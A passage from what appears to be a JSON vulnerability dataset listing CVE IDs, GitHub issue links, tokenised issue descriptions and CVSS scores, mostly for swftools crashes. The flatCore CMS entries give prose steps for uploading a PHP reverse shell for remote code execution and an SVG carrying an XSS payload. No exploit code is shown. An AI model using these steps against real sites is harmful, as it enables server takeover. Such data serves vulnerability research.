  70325. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV type3D1 APITAG NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70327. "severity": "MEDIUM",
  70328. "baseScore": 5.5,
  70329. "impactScore": 3.6,
  70330. "exploitabilityScore": 1.8
  70331. },
  70332. {
  70333. "CVE_ID": "CVE-2021-39558",
  70334. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/106",
  70335. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/106",
  70336. "Repo_new": "matthiaskramm/swftools",
  70337. "Issue_Created_At": "2020-08-02T03:17:40Z",
  70338. "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow APITAG APITAG NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70339. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70340. "severity": "HIGH",
  70341. "baseScore": 7.8,
  70342. "impactScore": 5.9,
  70343. "exploitabilityScore": 1.8
  70344. },
  70345. {
  70346. "CVE_ID": "CVE-2021-39559",
  70347. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/101",
  70348. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/101",
  70349. "Repo_new": "matthiaskramm/swftools",
  70350. "Issue_Created_At": "2020-08-01T02:18:46Z",
  70351. "description": "A SEGV in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV APITAG APITAG NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70352. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70353. "severity": "MEDIUM",
  70354. "baseScore": 5.5,
  70355. "impactScore": 3.6,
  70356. "exploitabilityScore": 1.8
  70357. },
  70358. {
  70359. "CVE_ID": "CVE-2021-39561",
  70360. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/102",
  70361. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/102",
  70362. "Repo_new": "matthiaskramm/swftools",
  70363. "Issue_Created_At": "2020-08-01T02:31:55Z",
  70364. "description": "A stack overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null APITAG output ERRORTAG POC FILETAG",
  70365. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70366. "severity": "HIGH",
  70367. "baseScore": 7.8,
  70368. "impactScore": 5.9,
  70369. "exploitabilityScore": 1.8
  70370. },
  70371. {
  70372. "CVE_ID": "CVE-2021-39562",
  70373. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/98",
  70374. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/98",
  70375. "Repo_new": "matthiaskramm/swftools",
  70376. "Issue_Created_At": "2020-08-01T02:04:36Z",
  70377. "description": "A stack overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow Stream NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70378. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70379. "severity": "MEDIUM",
  70380. "baseScore": 5.5,
  70381. "impactScore": 3.6,
  70382. "exploitabilityScore": 1.8
  70383. },
  70384. {
  70385. "CVE_ID": "CVE-2021-39563",
  70386. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/115",
  70387. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/115",
  70388. "Repo_new": "matthiaskramm/swftools",
  70389. "Issue_Created_At": "2020-08-05T07:02:23Z",
  70390. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70391. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70392. "severity": "MEDIUM",
  70393. "baseScore": 5.5,
  70394. "impactScore": 3.6,
  70395. "exploitabilityScore": 1.8
  70396. },
  70397. {
  70398. "CVE_ID": "CVE-2021-39564",
  70399. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/116",
  70400. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/116",
  70401. "Repo_new": "matthiaskramm/swftools",
  70402. "Issue_Created_At": "2020-08-05T07:06:56Z",
  70403. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70404. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70405. "severity": "HIGH",
  70406. "baseScore": 7.8,
  70407. "impactScore": 5.9,
  70408. "exploitabilityScore": 1.8
  70409. },
  70410. {
  70411. "CVE_ID": "CVE-2021-39569",
  70412. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/114",
  70413. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/114",
  70414. "Repo_new": "matthiaskramm/swftools",
  70415. "Issue_Created_At": "2020-08-05T06:59:30Z",
  70416. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70417. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70418. "severity": "HIGH",
  70419. "baseScore": 7.8,
  70420. "impactScore": 5.9,
  70421. "exploitabilityScore": 1.8
  70422. },
  70423. {
  70424. "CVE_ID": "CVE-2021-39574",
  70425. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/124",
  70426. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/124",
  70427. "Repo_new": "matthiaskramm/swftools",
  70428. "Issue_Created_At": "2020-08-05T07:40:08Z",
  70429. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output CODETAG POC FILETAG",
  70430. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70431. "severity": "HIGH",
  70432. "baseScore": 7.8,
  70433. "impactScore": 5.9,
  70434. "exploitabilityScore": 1.8
  70435. },
  70436. {
  70437. "CVE_ID": "CVE-2021-39575",
  70438. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/128",
  70439. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/128",
  70440. "Repo_new": "matthiaskramm/swftools",
  70441. "Issue_Created_At": "2020-08-06T05:20:06Z",
  70442. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70443. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70444. "severity": "MEDIUM",
  70445. "baseScore": 5.5,
  70446. "impactScore": 3.6,
  70447. "exploitabilityScore": 1.8
  70448. },
  70449. {
  70450. "CVE_ID": "CVE-2021-39577",
  70451. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/121",
  70452. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/121",
  70453. "Repo_new": "matthiaskramm/swftools",
  70454. "Issue_Created_At": "2020-08-05T07:26:44Z",
  70455. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70456. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70457. "severity": "HIGH",
  70458. "baseScore": 7.8,
  70459. "impactScore": 5.9,
  70460. "exploitabilityScore": 1.8
  70461. },
  70462. {
  70463. "CVE_ID": "CVE-2021-39579",
  70464. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/125",
  70465. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/125",
  70466. "Repo_new": "matthiaskramm/swftools",
  70467. "Issue_Created_At": "2020-08-05T07:42:59Z",
  70468. "description": "A heap buffer overflow in q.c NUMBERTAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70469. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70470. "severity": "HIGH",
  70471. "baseScore": 7.8,
  70472. "impactScore": 5.9,
  70473. "exploitabilityScore": 1.8
  70474. },
  70475. {
  70476. "CVE_ID": "CVE-2021-39582",
  70477. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/122",
  70478. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/122",
  70479. "Repo_new": "matthiaskramm/swftools",
  70480. "Issue_Created_At": "2020-08-05T07:32:22Z",
  70481. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG APITAG output ERRORTAG POC FILETAG",
  70482. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70483. "severity": "HIGH",
  70484. "baseScore": 7.8,
  70485. "impactScore": 5.9,
  70486. "exploitabilityScore": 1.8
  70487. },
  70488. {
  70489. "CVE_ID": "CVE-2021-39583",
  70490. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/136",
  70491. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/136",
  70492. "Repo_new": "matthiaskramm/swftools",
  70493. "Issue_Created_At": "2020-08-06T05:41:56Z",
  70494. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70496. "severity": "MEDIUM",
  70497. "baseScore": 5.5,
  70498. "impactScore": 3.6,
  70499. "exploitabilityScore": 1.8
  70500. },
  70501. {
  70502. "CVE_ID": "CVE-2021-39584",
  70503. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/130",
  70504. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/130",
  70505. "Repo_new": "matthiaskramm/swftools",
  70506. "Issue_Created_At": "2020-08-06T05:23:46Z",
  70507. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70508. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70509. "severity": "MEDIUM",
  70510. "baseScore": 5.5,
  70511. "impactScore": 3.6,
  70512. "exploitabilityScore": 1.8
  70513. },
  70514. {
  70515. "CVE_ID": "CVE-2021-39585",
  70516. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/133",
  70517. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/133",
  70518. "Repo_new": "matthiaskramm/swftools",
  70519. "Issue_Created_At": "2020-08-06T05:33:14Z",
  70520. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70521. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70522. "severity": "MEDIUM",
  70523. "baseScore": 5.5,
  70524. "impactScore": 3.6,
  70525. "exploitabilityScore": 1.8
  70526. },
  70527. {
  70528. "CVE_ID": "CVE-2021-39587",
  70529. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/129",
  70530. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/129",
  70531. "Repo_new": "matthiaskramm/swftools",
  70532. "Issue_Created_At": "2020-08-06T05:22:26Z",
  70533. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70534. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70535. "severity": "MEDIUM",
  70536. "baseScore": 5.5,
  70537. "impactScore": 3.6,
  70538. "exploitabilityScore": 1.8
  70539. },
  70540. {
  70541. "CVE_ID": "CVE-2021-39588",
  70542. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/131",
  70543. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/131",
  70544. "Repo_new": "matthiaskramm/swftools",
  70545. "Issue_Created_At": "2020-08-06T05:26:14Z",
  70546. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70547. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70548. "severity": "MEDIUM",
  70549. "baseScore": 5.5,
  70550. "impactScore": 3.6,
  70551. "exploitabilityScore": 1.8
  70552. },
  70553. {
  70554. "CVE_ID": "CVE-2021-39589",
  70555. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/132",
  70556. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/132",
  70557. "Repo_new": "matthiaskramm/swftools",
  70558. "Issue_Created_At": "2020-08-06T05:30:23Z",
  70559. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70560. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70561. "severity": "MEDIUM",
  70562. "baseScore": 5.5,
  70563. "impactScore": 3.6,
  70564. "exploitabilityScore": 1.8
  70565. },
  70566. {
  70567. "CVE_ID": "CVE-2021-39590",
  70568. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/137",
  70569. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/137",
  70570. "Repo_new": "matthiaskramm/swftools",
  70571. "Issue_Created_At": "2020-08-06T05:47:16Z",
  70572. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70573. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70574. "severity": "MEDIUM",
  70575. "baseScore": 5.5,
  70576. "impactScore": 3.6,
  70577. "exploitabilityScore": 1.8
  70578. },
  70579. {
  70580. "CVE_ID": "CVE-2021-39591",
  70581. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/135",
  70582. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/135",
  70583. "Repo_new": "matthiaskramm/swftools",
  70584. "Issue_Created_At": "2020-08-06T05:38:56Z",
  70585. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70586. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70587. "severity": "MEDIUM",
  70588. "baseScore": 5.5,
  70589. "impactScore": 3.6,
  70590. "exploitabilityScore": 1.8
  70591. },
  70592. {
  70593. "CVE_ID": "CVE-2021-39592",
  70594. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/138",
  70595. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/138",
  70596. "Repo_new": "matthiaskramm/swftools",
  70597. "Issue_Created_At": "2020-08-06T05:51:12Z",
  70598. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70599. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70600. "severity": "MEDIUM",
  70601. "baseScore": 5.5,
  70602. "impactScore": 3.6,
  70603. "exploitabilityScore": 1.8
  70604. },
  70605. {
  70606. "CVE_ID": "CVE-2021-39593",
  70607. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/139",
  70608. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/139",
  70609. "Repo_new": "matthiaskramm/swftools",
  70610. "Issue_Created_At": "2020-08-06T05:53:11Z",
  70611. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70612. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70613. "severity": "MEDIUM",
  70614. "baseScore": 5.5,
  70615. "impactScore": 3.6,
  70616. "exploitabilityScore": 1.8
  70617. },
  70618. {
  70619. "CVE_ID": "CVE-2021-39594",
  70620. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/142",
  70621. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/142",
  70622. "Repo_new": "matthiaskramm/swftools",
  70623. "Issue_Created_At": "2020-08-07T14:33:40Z",
  70624. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70626. "severity": "MEDIUM",
  70627. "baseScore": 5.5,
  70628. "impactScore": 3.6,
  70629. "exploitabilityScore": 1.8
  70630. },
  70631. {
  70632. "CVE_ID": "CVE-2021-39595",
  70633. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/141",
  70634. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/141",
  70635. "Repo_new": "matthiaskramm/swftools",
  70636. "Issue_Created_At": "2020-08-07T14:31:43Z",
  70637. "description": "A stack overflow in q.c NUMBERTAG causes Segmentation fault. System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  70638. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70639. "severity": "HIGH",
  70640. "baseScore": 7.8,
  70641. "impactScore": 5.9,
  70642. "exploitabilityScore": 1.8
  70643. },
  70644. {
  70645. "CVE_ID": "CVE-2021-39596",
  70646. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/146",
  70647. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/146",
  70648. "Repo_new": "matthiaskramm/swftools",
  70649. "Issue_Created_At": "2020-08-07T14:43:02Z",
  70650. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70651. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70652. "severity": "MEDIUM",
  70653. "baseScore": 5.5,
  70654. "impactScore": 3.6,
  70655. "exploitabilityScore": 1.8
  70656. },
  70657. {
  70658. "CVE_ID": "CVE-2021-39597",
  70659. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/143",
  70660. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/143",
  70661. "Repo_new": "matthiaskramm/swftools",
  70662. "Issue_Created_At": "2020-08-07T14:35:45Z",
  70663. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70664. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70665. "severity": "MEDIUM",
  70666. "baseScore": 5.5,
  70667. "impactScore": 3.6,
  70668. "exploitabilityScore": 1.8
  70669. },
  70670. {
  70671. "CVE_ID": "CVE-2021-39598",
  70672. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/145",
  70673. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/145",
  70674. "Repo_new": "matthiaskramm/swftools",
  70675. "Issue_Created_At": "2020-08-07T14:40:34Z",
  70676. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master fad6c2 URLTAG Command line PATHTAG D APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70677. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70678. "severity": "MEDIUM",
  70679. "baseScore": 5.5,
  70680. "impactScore": 3.6,
  70681. "exploitabilityScore": 1.8
  70682. },
  70683. {
  70684. "CVE_ID": "CVE-2021-39599",
  70685. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/7",
  70686. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/7",
  70687. "Repo_new": "cbkhwx/cxuucmsv3",
  70688. "Issue_Created_At": "2021-08-21T06:09:44Z",
  70689. "description": "2 xss vulnerability exists in FILETAG file.",
  70690. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  70691. "severity": "MEDIUM",
  70692. "baseScore": 6.1,
  70693. "impactScore": 2.7,
  70694. "exploitabilityScore": 2.8
  70695. },
  70696. {
  70697. "CVE_ID": "CVE-2021-39602",
  70698. "Issue_Url_old": "https://github.com/Gabe-commiter/Miniftpd/issues/1",
  70699. "Issue_Url_new": "https://github.com/gabe-commiter/miniftpd/issues/1",
  70700. "Repo_new": "gabe-commiter/miniftpd",
  70701. "Issue_Created_At": "2021-08-22T10:26:19Z",
  70702. "description": "Buffer overflows problem. Buffer overflow exists in the APITAG function in the APITAG file. Overwrite rbp when new path name length exceeds NUMBERTAG CODETAG",
  70703. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  70704. "severity": "MEDIUM",
  70705. "baseScore": 6.5,
  70706. "impactScore": 3.6,
  70707. "exploitabilityScore": 2.8
  70708. },
  70709. {
  70710. "CVE_ID": "CVE-2021-39608",
  70711. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/52",
  70712. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/52",
  70713. "Repo_new": "flatcore/flatcore-cms",
  70714. "Issue_Created_At": "2021-08-13T03:50:15Z",
  70715. "description": "RCE via upload addons plugin. RCE via upload addon plugin It was identified that an authenticated user (admin) has the possibility to upload malicious files without any restriction. In this specific case, arbitrary server side PHP code such as web shells can be uploaded. As a result the attacker can run arbitrary code on the server side with the privileges of the web server. This could lead to a full system compromise. To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS (admin user NUMBERTAG Click on APITAG NUMBERTAG Click on APITAG NUMBERTAG Click on APITAG or APITAG NUMBERTAG Choose a malious PHP file (revershell, APITAG example is FILETAG NUMBERTAG URL for malious PHP file: FILETAG Screenshots This POC for vuln : URLTAG Desktop (please complete the following information): OS: tested in Linux Browser : All Version : Last version Additional context This vulnerability is extremely serious affecting the system. An attacker can take control of the entire server.",
  70716. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  70717. "severity": "HIGH",
  70718. "baseScore": 7.2,
  70719. "impactScore": 5.9,
  70720. "exploitabilityScore": 1.2
  70721. },
  70722. {
  70723. "CVE_ID": "CVE-2021-39609",
  70724. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/53",
  70725. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/53",
  70726. "Repo_new": "flatcore/flatcore-cms",
  70727. "Issue_Created_At": "2021-08-13T04:02:13Z",
  70728. "description": "Cross Site Scripting (XSS). Describe the bug Cross Site Scripting (XSS) via upload image function To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS NUMBERTAG Click on APITAG file NUMBERTAG Drop svg file contains XSS payload , example filename : xss.svg NUMBERTAG and XSS in url : FILETAG Screenshots FILETAG xss.svg CODETAG Desktop (please complete the following information): OS: All Browser : All Version : Last version Additional context XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user",
  70729. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  70730. "severity": "MEDIUM",
  70731. "baseScore": 5.4,
  70732. "impactScore": 2.7,
  70733. "exploitabilityScore": 2.3
  70734. },
  70735. {
  70736. "CVE_ID": "CVE-2021-3962",
  70737. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/4446",
  70738. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/4446",
  70739. "Repo_new": "imagemagick/imagemagick",
  70740. "Issue_Created_At": "2021-11-06T05:20:44Z",
  70741. "description": "heap use after free in magick at dcm.c APITAG APITAG version NUMBERTAG Operating system Linux Operating system, version and so on OS: Ubuntu NUMBERTAG LTS Version: APITAG NUMBERTAG Q NUMBERTAG HDRI NUMBERTAG FILETAG Copyright: (C NUMBERTAG APITAG Studio Delegates (built in): fontconfig freetype jng jpeg lzma pangocairo png x xml zlib Compiler: gcc NUMBERTAG Description Hello, We are currently working on fuzz testing feature, and we found a heap use after free on magick . Steps to Reproduce build it APITAG run it APITAG output APITAG double free detected in tcache NUMBERTAG When I compile in ASAN mode APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG f NUMBERTAG at pc NUMBERTAG f0f NUMBERTAG c bp NUMBERTAG ffe3d8a7fd0 sp NUMBERTAG ffe3d8a7fc8 READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG thread T NUMBERTAG f0f NUMBERTAG b in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb8 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG d3 in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG dfd NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  70742. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70743. "severity": "HIGH",
  70744. "baseScore": 7.8,
  70745. "impactScore": 5.9,
  70746. "exploitabilityScore": 1.8
  70747. },
  70748. {
  70749. "CVE_ID": "CVE-2021-40145",
  70750. "Issue_Url_old": "https://github.com/libgd/libgd/issues/700",
  70751. "Issue_Url_new": "https://github.com/libgd/libgd/issues/700",
  70752. "Repo_new": "libgd/libgd",
  70753. "Issue_Created_At": "2021-05-26T08:24:45Z",
  70754. "description": "APITAG memory leak. Hello, I found that APITAG in gd_gd.c and APITAG in gd_webp.c are similar functions for different picture formats. You have changed APITAG because of CVETAG (double free), So It seems that you need to change APITAG too. I run two test files with ASAN, and the result is shown below. The test files are located in the 'tests/webp' folder. Test1: CODETAG ASAN result: ERRORTAG Test2: CODETAG ASAN result: ERRORTAG Is there another CVE here?",
  70755. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  70756. "severity": "HIGH",
  70757. "baseScore": 7.5,
  70758. "impactScore": 3.6,
  70759. "exploitabilityScore": 3.9
  70760. },
  70761. {
  70762. "CVE_ID": "CVE-2021-40153",
  70763. "Issue_Url_old": "https://github.com/plougher/squashfs-tools/issues/72",
  70764. "Issue_Url_new": "https://github.com/plougher/squashfs-tools/issues/72",
  70765. "Repo_new": "plougher/squashfs-tools",
  70766. "Issue_Created_At": "2019-09-10T17:09:19Z",
